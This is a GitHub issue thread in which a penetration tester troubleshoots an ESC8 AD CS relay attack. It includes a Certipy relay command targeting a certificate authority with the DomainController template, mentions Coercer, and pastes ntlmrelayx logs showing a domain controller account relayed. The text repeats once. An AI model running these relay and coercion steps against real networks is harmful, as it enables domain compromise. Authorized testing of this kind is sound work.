You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I don't think this is a Certipy-specific question/problem necessarily, but was hoping to get some assistance to determine if ESC8 can be definitively ruled in or out on this pentest.
I ran Certipy and it reports ESC8 on CA.DOMAIN.COM. I did the certipy relay -target ca.domain.com -template DomainController -debug. Then in another window I did coercer to get coerced auth going. Even though coercer reports many successful attempts, certipy returns nothing in the relay window. No errors, just nothing.
To sanity check things I used ntlmrelayx as the relayer, and it had more info during the relay itself:
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 1.2.3.4, attacking target http://ca.domain.com
[*] Status code returned: 403. Authentication does not seem required for URL
[-] No authentication requested by the server for url ca.domain.com
[*] IIS cert server may allow anonymous authentication, sending NTLM auth anyways
[*] HTTP server returned error code 403, treating as a successful login
[*] Authenticating against http://ca.domain.com as domain/dc1$ SUCCEED
[+] No more targets
[*] SMBD-Thread-7 (process_request_thread): Connection from 1.2.3.4 controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-8 (process_request_thread): Connection from 1.2.3.4 controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-9 (process_request_thread): Connection from 1.2.3.4 controlled, but there are no more targets left!
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[-] Error getting certificate! Make sure you have entered valid certiface template.
[+] No more targets
Looking back at my past issue on this, I learned the template name could be called KerberosAuthentication or DC. When I specify KerberosAuthentication I get different output with ntlmrelayx:
[*] SMBD-Thread-5 (process_request_thread): Received connection from 1.2.3.4, attacking target http://ca.domain.com
Authenticating against https://ca.domain.com as domain/DC1$ FAILED
I'm kind of left with two questions:
Any idea why certipy doesn't log anything during either of these relay attempts?
Do you have a method using some other tools to validate if the endpoint has been hardened against these attacks? I tried using the curl command I've seen in other posts to see if a WWW-AUTHENTICATE: NTLM response is returned (and it is!) but I figure I'm missing some other piece here.
The text was updated successfully, but these errors were encountered:
Hello!
I don't think this is a Certipy-specific question/problem necessarily, but was hoping to get some assistance to determine if ESC8 can be definitively ruled in or out on this pentest.
I ran Certipy and it reports ESC8 on CA.DOMAIN.COM. I did the
certipy relay -target ca.domain.com -template DomainController -debug. Then in another window I didcoercerto get coerced auth going. Even though coercer reports many successful attempts, certipy returns nothing in the relay window. No errors, just nothing.To sanity check things I used
ntlmrelayxas the relayer, and it had more info during the relay itself:Looking back at my past issue on this, I learned the template name could be called
KerberosAuthenticationorDC. When I specifyKerberosAuthenticationI get different output with ntlmrelayx:I'm kind of left with two questions:
curlcommand I've seen in other posts to see if aWWW-AUTHENTICATE: NTLMresponse is returned (and it is!) but I figure I'm missing some other piece here.The text was updated successfully, but these errors were encountered: